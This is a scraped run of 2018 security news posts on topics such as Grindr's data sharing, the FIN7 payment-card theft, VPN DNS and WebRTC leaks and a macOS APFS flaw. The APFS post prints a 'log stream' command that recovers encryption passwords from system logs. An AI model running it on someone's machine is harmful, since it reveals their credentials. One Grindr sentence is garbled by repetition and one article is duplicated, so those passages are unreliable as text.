“Unfortunately, approximately 90% of all extensions with mining scripts that developers have attempted to upload to Chrome Web Store have failed to comply with these policies, and have been either rejected or removed from the store.”

“Starting today, Chrome Web Store will no longer accept extensions that mine cryptocurrency,” 

Until now, Google only allowed those cryptocurrency mining extensions that explicitly informed users about their mining activities.

The Mountain View firm announced it will block all mining extensions that are not in compliance and secretly mine cryptocurrency using devices’ resources.

cryptocurrency mining extensions

Google pointed out that the ban on cryptocurrency mining extensions will not affect blockchain-related extensions such as Bitcoin price checkers and cryptocurrency wallet managers.

“Existing extensions that mine cryptocurrency will be delisted from the Chrome Web Store in late June. Extensions with blockchain-related purposes other than mining will continue to be permitted in the Web Store.” continues the blog post.

Google ban is another step to protect its users from hidden risks, it follows the recent announcement to ban advertisements related to cryptocurrency.

“This policy is another step forward in ensuring that Chrome users can enjoy the benefits of extensions without exposing themselves to hidden risks.” concluded Google.

Google is not the unique media firm that imposed a ban on cryptocurrency-related abuses, Twitter recently announced the ban for cryptocurrency-related ads on its platform, in January, Facebook banned all ads promoting cryptocurrency-related initiatives, including Bitcoin and ICOs.

Pierluigi Paganini

(Security Affairs – Chrome Web Store, cryptocurrency mining extensions)

The post Google to banish cryptocurrency mining extensions from official Chrome Web Store appeared first on Security Affairs.

Grindr shared people’ HIV status with other companies

An analysis conducted by the Norwegian research nonprofit SINTEF revealed that the popular Grindr gay dating app is sharing its users’ HIV status with two other companies.

Grindr gay-dating app made the headlines again, a few days ago an NBC report revealed that the app was affected by 2 security issues (now patched) that could have exposed the information of its more than 3 million daily users.

An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working at his website C*ckblocked that allowed users to see who blocked them on Grindr.

Faden discovered that once a Grindr logged in his service, it was possible to access to a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

While the media were sharing the news, another disconcerting revelation was made by BuzzFeed and the Norwegian research nonprofit SINTEF, BuzzFeed and the Norwegian research nonprofit SINTEF.BuzzFeed and the Norwegian research nonprofit SINTEF.BuzzFeed and the Norwegian research nonprofit SINTEF, Grindr has been sharing data on whether its users have HIV with two outside companies, according to BuzzFeed and the Norwegian research nonprofit SINTEF.

“SVT and SINTEF conducted an experiment the 7th of February 2018 to analyse privacy leaks in the dating application Grindr. This was realised for the Sweedish TV program “Plus granskar“, that you may watch online.reported SINTEF.

“We discovered that Grindr contains many trackers, and shares personal information with various third parties directly from the application.”

Grindr HIV data.jpg

Profiles include sensitive information such as HIV status, when is the last time a user got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP.

“It is unnecessary for Grindr to track its users HIV Status using third-parties services. Moreover, these third-parties are not necessarily certified to host medical data, and Grindr’s users may not be aware that they are sharing such data with them.” added SINTEF.

The disconcerting aspect of this revelation is that Grindr has been sharing users’ HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics.

“The two companies — Apptimize and Localytics, which help optimize apps — receive some of the information that Grindr users choose to include in their profiles, including their HIV status and “last tested date.” BuzzFeed reports

“Because the HIV information is sent together with users’ GPS data, phone ID, and email, it could identify specific users and their HIV status, according to Antoine Pultier, a researcher at the Norwegian nonprofit SINTEF, which first identified the issue.”

In some cases, this data was not protected by encryption.

Hours after BuzzFeed’s report, Grindr told Axios that it had made a change to stop sharing users’ HIV status. The company’s security chief, Bryce Case, told Axios that he felt the company was being “unfairly … singled out” in light of Facebook’s Cambridge Analytica scandal and said that the company’s practices didn’t deviate from the industry norm.

Grindr’s chief technology officer, Scott Chen, pointed out that data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.”

Anyway, Grindr doesn’t sell user data to third parties.

In a statement released Monday afternoon, Grindr confirmed that it would stop sharing the HIV data.

The company also confirmed to CNNMoney that it has already deleted HIV data from Apptimize, and is in the process of removing it from Localytics.

Pierluigi Paganini

(Security Affairs – mobile app, privacy)

The post Grindr shared people’ HIV status with other companies appeared first on Security Affairs.

Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores

FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

A new data breach made the headlines, the victim is Saks Fifth Avenue and Lord & Taylor stores. According to the parent company Hudson’s Bay Company (HBC), the security breach exposed customer payment card data, customer payment card data at certain Saks Fifth Avenue, the discount store brand Saks Off 5TH and Lord & Taylor stores in North America are impacted.

“We recently became aware of a data security issue involving customer payment card data at certain Saks Fifth Avenue, Saks OFF 5TH, and Lord & Taylor stores in North America. We identified the issue, took steps to contain it, and believe it no longer poses a risk to customers shopping at our stores.” reads the official statement issued by Lord & Taylor.

“While the investigation is ongoing, there is no indication that this affects our e-commerce or other digital platforms,”

The hackers did not compromise the HBC’s e-commerce or other digital platforms, the company promptly informed authorities and hired security investigators to

“We are working rapidly with leading data security investigators to get our customers the information they need, and our investigation is ongoing. We also are coordinating with law enforcement authorities and the payment card companies,” continues the announcement.

The HBC issued the following statement:

“HBC has identified the issue, and has taken steps to contain it,” the company said in a statement. “Once the Company has more clarity around the facts, it will notify customers quickly and will offer those impacted free identity protection services, including credit and web monitoring. HBC encourages customers to review their account statements and contact their card issuers immediately if they identify activity or transactions they do not recognize.”

The data breach was first reported by threat intelligence firm Gemini Advisory, which noticed the offer for sale of over five million stolen credit and debit cards on a cybercrime marketplace called JokerStash.

Saks Fifth Avenue Lord & Taylor stores

The researchers linked the security breach to the financially-motivated FIN7 APT group also known as Carbanak or Anunak.

The group continuously changed attack techniques and implemented new malware obfuscation methods. The FIN7 group has been active since late 2015, it was highly active since the beginning of 2017.

Fin7 was spotted early 2017 when it targeted personnel involved with the United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

“On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards offered for sale on the dark web. Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores.” the company said in a post.

“Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores,” 

As of Sunday, only a small portion of compromised records have been offered for sale, crooks offered roughly 35,000 records for Saks Fifth Avenue and 90,000 records for Lord & Taylor.

“As of this writing, approximately 125,000 records have been released for sale, although we expect the entire cache to become available in the following months.” added Gemini.

At the time of writing HBC did not provide details on the extent of the security breach, it is still unclear how the hackers have stolen payment card data, experts believe hackers may have compromised point-of-sale systems.

“Based on the analysis of records that are currently available, it appears that all Lord & Taylor and 83 US based Saks Fifth Avenue locations have been compromised. In addition, we identified three potentially compromised stores located in Ontario, Canada. However, the majority of stolen credit cards were obtained from New York and New Jersey locations.” concluded Gemini.

Pierluigi Paganini

(Security Affairs – HBC data breach, FIN7 APT)

The post Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores appeared first on Security Affairs.

Reducing the impact of AI-powered bot attacks

Fraudsters are harnessing AI to behave like humans, trick users and scale-up attacks.Bot attacks are drawing more and more headlines with tales of identity theft. The wealth of consumer data

The post Reducing the impact of AI-powered bot attacks appeared first on The Cyber Security Place.

70% of VPN Chrome Extensions Leak Your DNS

Researchers John Mason with the help of TheBestVPN.com the ethical hacker File Descriptor from Cure53 tested 15 VPN services and 10 of them were causing DNS leaks through their Chrome browser extensions.

Intro

Google Chrome has a feature called DNS Prefetching(https://www.chromium.org/developers/design-documents/dns-prefetching) which is an attempt to resolve domain names before a user tries to follow a link.

It’s a solution to reduce latency delays of DNS resolution time by predicting what websites a user will mostly likely visit next by pre-resolving the domains of those websites.

The Problem

When using a VPN browser extensions, Chrome provides two modes to configure the proxy connections, fixed_servers and pac_script.

In fixed_servers mode, an extension specifies the host of an HTTPS/SOCKS proxy server and later all connections will then go through the proxy server.

In pac_script mode on the other hand, an extension provides a PAC script which allows dynamically changing the HTTPS/SOCKS proxy server’s host by various conditions. For example, a VPN extension can use a PAC script that determines if a user is visiting Netflix by having a rule that compares the URL and assigns a proxy server that is optimized for streaming. The highly dynamic nature of PAC scripts means the majority of VPN extensions use the mode pac_script over fixed_servers.

“Now, the issue is that DNS Prefetching continues to function when pac_script mode is used. Since HTTPS proxy does not support proxying DNS requests and Chrome does not support DNS over SOCKS protocol, all prefetched DNS requests will go through the system DNS. This essentially introduces DNS leak.”

There are 3 scenarios that trigger DNS Prefetching:

  • Manual Prefetch
  • DNS Prefetch Control
  • Omnibox

The first two allow a malicious adversary to use a specifically crafted web page to force visitors to leak DNS requests. The last one means when a user is typing something in the URL address bar (i.e. the Omnibox), the suggested URLs made by Chrome will be DNS prefetched. This allows ISPs to use a technology called “Transparent DNS proxy” to collect websites the user frequently visits even when using browser VPN extension.

Test Your VPN For DNS Leaks

To test if your VPN is vulnerable, do the following test:

  1. Activate the Chrome plugin of your VPN
  2. Go to chrome://net-internals/#dns
  3. Click on “clear host cache”
  4. Go to any website to confirm this vulnerability

If you find a VPN that is not listed, but leaks – please send us a screenshot (john@thebestvpn.com) and we’ll update the list.

Affected VPNs That We’ve Tested (2nd of April):

  1. Hola VPN
  2. OperaVPN
  3. TunnelBear
  4. HotSpot Shield
  5. Betternet
  6. PureVPN
  7. VPN Unlimited
  8. ZenMate VPN
  9. Ivacy VPN
  10. DotVPN
Example of PureVPN leak

VPNs That Don’t Leak

  1. WindScribe
  2. NordVPN
  3. CyberGhost
  4. Private Internet Access
  5. Avira Phantom VPN
Example: NordVPN doesn’t leak

Solution/Fix

Users who want to protect themselves should follow the remediation:

  • 1. Navigate to chrome://settings/ in the address bar
  • 2. Type “predict” in “Search settings”
  • 3. Disable the option “Use a prediction service to help complete searches and URLs typed in the address bar” and “Use a prediction service to load pages more quickly”

This research was put together with the help of File Descriptor – ethical hacker from Cure53.

P.S. Note that online DNS leak test services like dnsleaktest.com are unable to detect this kind of DNS leak because the DNS requests are only issued under specific circumstances.

The Original post is available at here

Pierluigi Paganini

(Security Affairs – Chrome Extensions, hacking)

The post 70% of VPN Chrome Extensions Leak Your DNS appeared first on Security Affairs.

Podcast Episode 90: WannaCry zombie haunts Boeing, UL tests for cyber security and Harvard war games election hacking

In this week’s podcast, Episode #90: has the WannaCry ransomware returned from the dead? We talk with an expert from Juniper Networks about what might be behind the outbreak at Boeing. Also: Underwriters Lab and Johnson Controls join us on the podcast to talk about a recent milestone: UL’s award of the first ever Level 3 certificate for...

Read the whole entry... »

Related Stories

After Cambridge Analytica scandal Facebook announces Election security Improvements

After Cambridge Analytica case, Facebook announced security improvements to prevent future interference with elections.

Facebook is under the fire after the revelation of the Cambridge Analytica case and its role in the alleged interference to the 2016 US presidential election.

While the analysts are questioning about the interference with other events, including the Brexit vote, Facebook is now looking to prevent such kind of operations against any kind of election.

Guy Rosen, Facebook VP of Product Management declared that everyone is responsible for preventing the same kind of attack to the democracy and announced the significant effort Facebook will spend to do it.

“By now, everyone knows the story: during the 2016 US election, foreign actors tried to undermine the integrity of the electoral process. Their attack included taking advantage of open online platforms — such as Facebook — to divide Americans, and to spread fear, uncertainty and doubt,” said Guy Rosen.

“Today, we’re going to outline how we’re thinking about elections, and give you an update on a number of initiatives designed to protect and promote civic engagement on Facebook.”

Facebook plans to improve the security of elections in four main areas: combating foreign interference, removing fake accounts, increasing ads transparency, and reducing the spread of false news.

Alex Stamos, Facebook’s Chief Security Officer, added that the company always fight “fake news,” explaining that the term is used to describe many malicious activities including:

  1. Fake identities– this is when an actor conceals their identity or takes on the identity of another group or individual;
  2. Fake audiences– so this is using tricks to artificially expand the audience or the perception of support for a particular message;
  3. False facts – the assertion of false information; and
  4. False narratives– which are intentionally divisive headlines and language that exploit disagreements and sow conflict. This is the most difficult area for us, as different news outlets and consumers can have completely different on what an appropriate narrative is even if they agree on the facts.

“When you tease apart the overall digital misinformation problem, you find multiple types of bad content and many bad actors with different motivations.” said Alex Stamos.

“Once we have an understanding of the various kinds of “fake” we need to deal with, we then need to distinguish between motivations for spreading misinformation. Because our ability to combat different actors is based upon preventing their ability to reach these goals.” said Stamos.

“Each country we operate in and election we are working to support will have a different range of actors with techniques are customized for that specific audience. We are looking ahead, by studying each upcoming election and working with external experts to understand the actors involved and the specific risks in each country.”

Stamos highlighted the importance to profile the attackers, he distinguished profit-motivated organized group, ideologically motivated groups, state-sponsored actors, people that enjoy causing chaos and disruption, and groups having multiple motivations such as ideologically driven groups.

Facebook is working to distinguish between motivations for spreading misinformation and implement the necessary countermeasures.

Facebook

Currently, Facebook already spends a significant effort in combatting fake news and any interference with elections.

Samidh Chakrabarti, Product Manager, Facebook, explained that the social media giant is currently blocking millions of fake accounts each day with a specific focus on those pages that are created to spread inauthentic civic content.

Chakrabarti explained that pages and domains that are used to share fake news is increasing, in response, Facebook doubles the number of people working on safety issues from 10,000 to 20,000. This hard job is mainly possible due to the involvement of sophisticated machine learning systems.

“Over the past year, we’ve gotten increasingly better at finding and disabling fake accounts. We’re now at the point that we block millions of fake accounts each day at the point of creation before they can do any harm.” said Chakrabarti.

“Rather than wait for reports from our community, we now proactively look for potentially harmful types of election-related activity, such as Pages of foreign origin that are distributing inauthentic civic content. If we find any, we then send these suspicious accounts to be manually reviewed by our security team to see if they violate our Community Standards or our Terms of Service. And if they do, we can quickly remove them from Facebook. “

But we all know that Facebook is a business that needs to increase profits, for this reason ads are very important for it.

Facebook is building a new transparency feature for the ads on the platform, dubbed View Ads, that is currently in testing in Canada. View Ads allows anyone to view all the ads that a Facebook Page is running on the platform.

“you can click on any Facebook Page, and select About, and scroll to View Ads.” explained Rob Leathern, Product Management Director.

“Next we’ll build on our ads review process and begin authorizing US advertisers placing political ads. This spring, in the run up to the US midterm elections, advertisers will have to verify and confirm who they are and where they are located in the US,”

This summer, Facebook will launch a public archive with all the ads that ran with a political label.

Stay tuned ….

Pierluigi Paganini

(Security Affairs – Facebook, fake news)

The post After Cambridge Analytica scandal Facebook announces Election security Improvements appeared first on Security Affairs.

MITRE is evaluating a service dubbed ATT&CK for APT detection

MITRE is evaluating a new service dubbed ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) for APT detection.

MITRE is going to offer a new service dubbed ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) to evaluate products based on their ability in detecting advanced persistent threats.

“MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target.” reads the MITRE’s official page. “ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.”

ATT&CK

The MITRE ATT&CK service will evaluate endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE will adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

In my opinion, sharing information about attackers’ TTPs is essential and such kind of initiative is very important for cyber security community.

Jessica Payne from Microsoft Windows Defender praised the MITRE ATT&CK service.

The knowledge base was initially collected as a tool to allow red team members to communicate more easily with blue team members and corporate executives, it comes from publicly available sources.

“ATT&CK provides a common framework for evaluating post-breach capabilities,” said Duff. “We believe that objective and open testing based on ATT&CK will advance capabilities and help drive the entire endpoint detection and response market forward.”

According to Duff, internal MITRE information doesn’t contaminate the knowledge base.

In this phase, MITRE intends to evaluate its service and its efficiency, the first case study will be based on APT3/Gothic Panda and will evaluate the ability of products in detecting this threat.

“As part of their participation in MITRE’s impartial cyber evaluation, cybersecurity vendors will be provided clear articulation of their capabilities, as well as access to MITRE’s cyber experts’ feedback for improving their products.” reads the statement published by MITRE. “Details captured will include the ATT&CK technique tested, specific actions the assessors took to execute, and details on the product’s ability to detect the emulated adversary behavior.”

MITRE, for this first round, call for vendors to contribute until April 13, 2018.

Pierluigi Paganini

(Security Affairs – ATT&CK technique, MITRE)

The post MITRE is evaluating a service dubbed ATT&CK for APT detection appeared first on Security Affairs.

VPNs & Privacy Browsers leak users’ IPs via WebRTC

The security researcher Dhiraj Mishra (@mishradhiraj_) has studied how VPNs & Privacy Browsers leak users’ IPs via WebRTC

Hi Internet,

You might have heard about VPN’s & Privacy Browsers leaking users’ IPs via WebRTC [1[2]
Summary:
Got CVE-2018-6849 reserved, wrote a Metasploit Module for this issue which uses WebRTC and collects the leak private IP address, however this module may be implemented as a new library in (browser_exploit_server.rb) in MSF. #cheers What is WebRTC ?
WebRTC (Web Real-Time Communication) provides supports to web browser on a real-time communication via API.So let’s get started….There are “multiple” online services and JavaScript code available which uses WebRTC function. Even if you are using VPN’s or Privacy based browsers it leaks your actual public and private IP address.I think this is more of a privacy issue rather than security if we talk specifically in browser-based bug bounty, however, such information can help an attacker to do further recon/attack if they are in the same network.Most of the browser have WebRTC enabled by default,Mozilla Team says :This is a well-known property of webrtc – see the duplicate bug.
http://tools.ietf.org/html/draft-ietf-rtcweb-security-arch-07#section-5.4

Chrome Team says : 

We’ve already done what we plan to do, following the guidelines in https://tools.ietf.org/html/draft-ietf-rtcweb-ip-handling-04. And we offer a “Network Limiter” extension (https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia?hl=en) to turn on more restrictive modes.

Don’t forget Facebook even they have Webkits and it is vulnerable too.
Facebook Team says :

Hi Dhiraj,

Thank you for your report. We’ve looked into your finding but determined the information being leaked is not sensitive enough to warrant a bounty. We may consider leakage of a victims referrer header, but it would have to display a full and potentially sensitive path. However, we have protections in place which prevent this from happening. Although this finding doesn’t qualify we still appreciate your time and effort sending it in.

Okay if your an android lover, you would be aware with android webkit though, The android webkit also leaks IP address as well, I tested this on Nokia 8 android 8.1.0 and the issue still exists.

Android Team says: 

The Android security team has conducted an initial severity assessment on this report. Based on our published severity assessment matrix (1) it was rated as not being a security vulnerability that would meet the severity bar for inclusion in an Android security bulletin.

Pheewww !  then what, I started targeting privacy browser and the very first browser came in my mind was DuckDuck Go which has 1,000,000+download rate in Android market and being an privacy based browser the WebRTC was enabled over there and it leaks your IP address, I reported the same to DD Go Security Team.

Duck Duck Go Team says:
Hi again Dhiraj,

Thank you for trying out the new browser and for sending this report,
including the security team. They’re currently looking into this and
I’ll let you know if any further information is needed.

There’s a similar discussion in the Firefox Focus for Android repository
on GitHub, so we’ll keep an eye on that too:
https://github.com/mozilla-mobile/focus-android/issues/609
  
Hmmmm cool, then CVE-2018-6849was assign for this issue, However I keep on taking follow up for them but they are taking too long time to patch. #Unpatched

Then I thought of creating module for this, many thanks to Brendan Coles who helped me in this and even suggested this can be used has a functionality to a HTTP library would be more useful, as it could be leveraged by existing exploits and info gathering modules.

WebRTC ip leak
Working of my MSF Module on DuckDuck Go Privacy Browser

In between RageLtMan also gave his thoughts that “I could actually see a benefit to this being in lib for use by things like #8648. I can inject the separate script ref in the response via the MITM mechanism, but would be cool to just generate and serve the JS directly (for any script we think will have more than 2 weeks of lifetime in browsers). Thanks for the PR”

Outcome:
So lets see, I started with private IP leak vulnerability which turned to CVE-2018-6849, which gave rise to a Metasploit module, which will in turn became a part of MSF library,

now that’s cool. Hope you like the read……
About the Author: Security Researcher Dhiraj Mishra ()

Pierluigi Paganini

(Security Affairs – WebRTC, hacking)

The post VPNs & Privacy Browsers leak users’ IPs via WebRTC appeared first on Security Affairs.

Philippine central bank has thrown an alert after SWIFT hackers hit Malaysia central bank

The Philippine central bank has thrown an alert to local financial institutions following a cyber attack against the SWIFT servers at the Malaysian central bank.

The Philippine central bank has thrown an alert to local financial institutions following a cyber attack against the Malaysian central bank.

According to Malaysian governor, the hackers attempted to steal money through fraudulent wire transfers, the good news is that the attack failed.

Bank Negara Malaysia confirmed that no funds were lost in the cyber attack, the hackers sent fake wire-transfer requests over the SWIFT bank messaging network to the target bank in order to trick it to transfer the money.

“We issued a general alert reminder as soon as we got BNM advisory to be extra careful over the long holiday. Although banks already do that as SOP (standard operating procedure),”Bangko Sentral ng Pilipinas Governor Nestor Espenilla said in a phone message.

At the time of writing is still unclear who is behind the attack or the way the hacker breached the SWIFT systems used by the bank.

“Bank Negara did not say who was behind the hack or how they accessed its SWIFT servers. The central bank, which supervises 45 commercial banks in Malaysia, said on Thursday there was no disruption to other payment and settlement systems the central bank operates because of the cyber attack.” reported the Straits Times.

SWIFT

Bank Negara said it had taken additional security measures to protect its stakeholders.

“All unauthorised transactions were stopped through prompt action in strong collaboration with SWIFT, other central banks and financial institutions,” it said in a statement.

The Philippine banks were also involved in the clamorous 2016 cyber heist when hackers stole US$81 million from the Bangladesh central bank, at the time the hackers transferred money into several accounts at Manila-based Rizal Commercial Banking Corp (RCBC) and then used them into the local casino industry.

The Philippine central bank fined RCBC a record one billion pesos (US$20 million) in 2016 for the failure to prevent the fraudulent transfers of money.

RCBC sustained that a rogue employee was responsible for the movement.

Mr Abu Hena Mohd. Razee Hassan, deputy governor of Bangladesh Bank, said the latest attack against the Malaysian central bank showed that the SWIFT platform remained vulnerable.

“After the attack on our central bank, SWIFT took several measures to protect the system globally but yet this is happening, meaning criminals have more ability and more capable weapons,” Mr Razee Hassan told Reuters in Dhaka.

“So this is the time to further improve the financial transfer system globally.”

Pierluigi Paganini

(Security Affairs – SWIFT, Malaysia central bank)

The post Philippine central bank has thrown an alert after SWIFT hackers hit Malaysia central bank appeared first on Security Affairs.

Apple macOS issues reveal passwords for APFS encrypted volumes in plaintext

A security expert discovered severe security issues in APFS file system for macOS High Sierra that expose passwords of encrypted external drives in plain text.

A vulnerability in APFS file system for macOS High Sierra operating system has been discovered by forensic analyst Sarah Edwards.

According to Edwards, the flaw exposes passwords of encrypted external drives in plain text.

Apple File System (APFS) is a proprietary file system for macOS High Sierra and later, iOS 10.3 and later, tvOS 10.2 and later, and watchOS 3.2 and later, developed and deployed by Apple Inc. APFS is optimized for flash solid-state drive storage, it aims to improve encryption and performance.

The flaw leaves encryption password for a newly created APFS volume in the unified logs in plaintext, it also allows encrypting previously created but unencrypted volumes.

“I’ve been updating my course (Mac and iOS Forensics and Incident Response) to use new APFS disk images (APFS FTW!) and came across something that both incredibly useful from a forensics perspective but utterly horrifying from a security standpoint. Screenshot below of my course disk image.” states the blog post published by Edwards.

APFS flaw

“It may not be noticeable at first (apart from the highlighting I’ve added of course), but the text “frogger13” is the password I used on a newly created APFS formatted FileVault Encrypted USB drive with the volume name “SEKRET”. (The new class images have a WarGames theme, hence the shout-outs to classic video games!)”

This means that anyone with access to the machine can see passwords stored in plaintext, the experts also warned that a malware could be used to collect log files to gather passphrase.

The password for an encrypted APFS volume can be retrieved by running e executing the following ‘newfs_apfs’ command in the terminal:

log stream --info --predicate 'eventMessage contains "newfs_"'

Edwards updated his post to highlight that he has discovered similar log entries in another system log that is more persistent.

“In and update to my previously updated blog article, I have found another instance where the plaintext password was written to system logs. This time I found it in more persistent log. This is actually a worse problem than the one I previously reported on.” he wrote in a new blog post.
“The previous examples were found in the unified logs which can hang around for a few weeks, this new example stores the exact same information in the system’s /var/log/install.log. I have found that the install.log will only get wiped out upon major re-installation (ie: 10.11 -> 10.12 -> 10.13), “

APFS flaw 2

Edwards pointed out that after the Twitter user @sirkkalap announced he was unable to re-create the issue he had previously reported, he was also unable to reproduce it.

“I assumed that at some point in the past few days a silent security update was pushed out. I went to my install.log file to investigate further. As far as updates go – the only thing that has potential to be the cause of the fix is a GateKeeper ConfigData update v138 (com.apple.pkg.GatekeeperConfigData.16U1432).” said Edwards.

The expert highlighted that you would not find the password in the plaintext when converting a non-APFS drive to APFS and then encrypt the drive.

The flaw affects only macOS 10.13 and 10.13.1, while later versions of macOS High Sierra have somehow reportedly addressed the issue.

In the past months, other two issues were discovered in the APFS, in February the Apple expert Mike Bombich discovered an APFS Filesystem vulnerability that could lead macOS losing data under certain conditions. In October 2017, Apple released a patch for macOS High Sierra 10.13 that addressed also a flaw in Apple file system that exposes encrypted drive’s password in the hint box.

Pierluigi Paganini

(Security Affairs – APFS Filesystem, hacking)

The post Apple macOS issues reveal passwords for APFS encrypted volumes in plaintext appeared first on Security Affairs.

Security Affairs: Russian hacker Yevgeni Nikulin was extradited to the United States

Last week, the Czech Republic announced it had extradited the Russian hacker Yevgeni Nikulin (29) to the United States.

Yevgeni Nikulin was requested by the US for alleged cyber attacks on social networks and by the Russian authorities that charged him with frauds. According to US authorities, the man targeted LinkedIn and Formspring and hacked into the file hosting service Dropbox.

The Russian criminal was arrested in Prague in October 2016 in an international joint operation with the FBI.

The case is in the middle of an arm wrestling between Moscow and Washington, the US Government are accusing Russia to have interfered with 2016 Presidential election through hacking.

In May 2017, a Czech court ruled that Nikulin can be extradited to either Russia or the United States, leaving the final decision to the Justice Minister Robert Pelikan.

The Czech justice ministry confirmed “the extradition of Russian citizen Yevgeni Nikulin to the United States,” ministry spokeswoman Tereza Schejbalova said on Twitter.

The extradition “took place overnight,” she added.

Nikulin was transferred via plane after midnight Thursday.

“We confirm extradition to the United States,” a spokeswoman said in a text message. “He has already flown out.”

Pierluigi Paganini

(Security Affairs – Yevgeni Nikulin, hacking)

The post Russian hacker Yevgeni Nikulin was extradited to the United States appeared first on Security Affairs.



Security Affairs

Russian hacker Yevgeni Nikulin was extradited to the United States

Last week, the Czech Republic announced it had extradited the Russian hacker Yevgeni Nikulin (29) to the United States.

Yevgeni Nikulin was requested by the US for alleged cyber attacks on social networks and by the Russian authorities that charged him with frauds. According to US authorities, the man targeted LinkedIn and Formspring and hacked into the file hosting service Dropbox.

The Russian criminal was arrested in Prague in October 2016 in an international joint operation with the FBI.

The case is in the middle of an arm wrestling between Moscow and Washington, the US Government are accusing Russia to have interfered with 2016 Presidential election through hacking.

In May 2017, a Czech court ruled that Nikulin can be extradited to either Russia or the United States, leaving the final decision to the Justice Minister Robert Pelikan.

The Czech justice ministry confirmed “the extradition of Russian citizen Yevgeni Nikulin to the United States,” ministry spokeswoman Tereza Schejbalova said on Twitter.

The extradition “took place overnight,” she added.

Nikulin was transferred via plane after midnight Thursday.

“We confirm extradition to the United States,” a spokeswoman said in a text message. “He has already flown out.”

Pierluigi Paganini

(Security Affairs – Yevgeni Nikulin, hacking)

The post Russian hacker Yevgeni Nikulin was extradited to the United States appeared first on Security Affairs.

Tens of thousands of misconfigured Django apps leak sensitive data

The security researcher Fábio Castro discovered tens of thousands of Django apps that expose sensitive data because developers forget to disable the debug mode.

Security researchers have discovered misconfigured Django applications that are exposing sensitive information, including passwords, API keys, or AWS access tokens.

Django is a very popular high-level Python Web framework that allows rapid development of Python-based web applications.

The researcher Fábio Castro explained that installs expose data because developers forget to disable the debug mode for the Django app.

Castro found 28,165 apps querying Shodan for Django installs that have debug mode enabled.

I made the same query a few hours later and I obtained 28,911 results.

Django apps

Many servers with debug mode enabled expose very, the experts discovered server passwords and AWS access tokens that could be used by hackers to gain full control of the systems.

“I found this as I was working with the Django framework on a small project,” Castro told Bleeping Computer  “I noticed some error exception and then went searching on Shodan.”

“The main reason [for all the exposures] is the debug mode enabled,” Castro says. “This is not a failure from Django’s side. My recommendation is to disable debugging mode when deploying the application to production.

Pierluigi Paganini

(Security Affairs – Django framework, hacking)

The post Tens of thousands of misconfigured Django apps leak sensitive data appeared first on Security Affairs.

Grindr gay-dating app exposed millions of users’ private data, messages, locations

According to an NBC report, the Grindr gay-dating app was affected by 2 security issues (now patched) that could expose the information of its more than 3 million daily users.

Every day we read of a new data breach, in some cases, exposed data could have a severe impact on the victim.

According to an NBC report, the Grindr gay-dating app was affected by 2 security issues (now patched) that could expose the information of its more than 3 million daily users.

An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working at his website C*ckblocked that allowed users to see who blocked them on Grindr.

Faden discovered that once a Grindr logged in his service, it was possible to access to a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

NBC noted that C*ckblocked exploited a “similar security loophole” to one that was recently used by Cambridge Analytica to create a profile of more than 50 million Facebook users.

“Grindr makes public the location of many of its users, but allows for users to opt out of this feature. Faden found that he could find the location of users who had opted out if they connected their Grindr profiles through his third-party website.reported NBC.

“One could, without too much difficulty or even a huge amount of technological skill, easily pinpoint a user’s exact location,” Faden explained. 

Grindr gay-dating app

Grindr confirmed it was aware of the issue discovered by Faden and it had addressed them. Faden shut down his service after Grindr changed its policy on access to data on which users had blocked other users.

Grindr recommends its users to avoid using Grindr logins for other apps or web services.

“Grindr moved quickly to make changes to its platform to resolve this issue,” the company said in the statement. “Grindr reminds all users that they should never give away their username and password to any third parties claiming to provide a benefit, as they are not authorized by Grindr and could potentially have malicious intent.”

The company published the following statement on its official Twitter account:

In the past, other experts found similar issues in the Grindr service, in 2014 researchers at cybersecurity firm Synack found that it allowed any user see the profiles and locations of people. Unfortunately, the problems were not completely fixed and two years after Wired published an interesting article about the experiments of experts that were still able to figure out users’ locations.

Pierluigi Paganini

(Security Affairs – privacy, Grindr gay-dating app)

The post Grindr gay-dating app exposed millions of users’ private data, messages, locations appeared first on Security Affairs.

Fauxpersky Keylogger masqueraded as Kaspersky Antivirus and spreads via USB drives

 

Security researchers at Cybereason recently discovered a credential-stealing malware dubbed Fauxpersky, that is masquerading as Kaspersky Antivirus and spreading via infected USB drives.

Fauxpersky was written in AutoIT or AutoHotKey, which respectively are a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting and a free keyboard macro program to send keystrokes to other applications.

The analysis of infected systems revealed the existence of four dropped files, attackers named them as Windows system files: Explorers.exe, Spoolsvc.exe, Svhost.exe, and Taskhosts.exe.

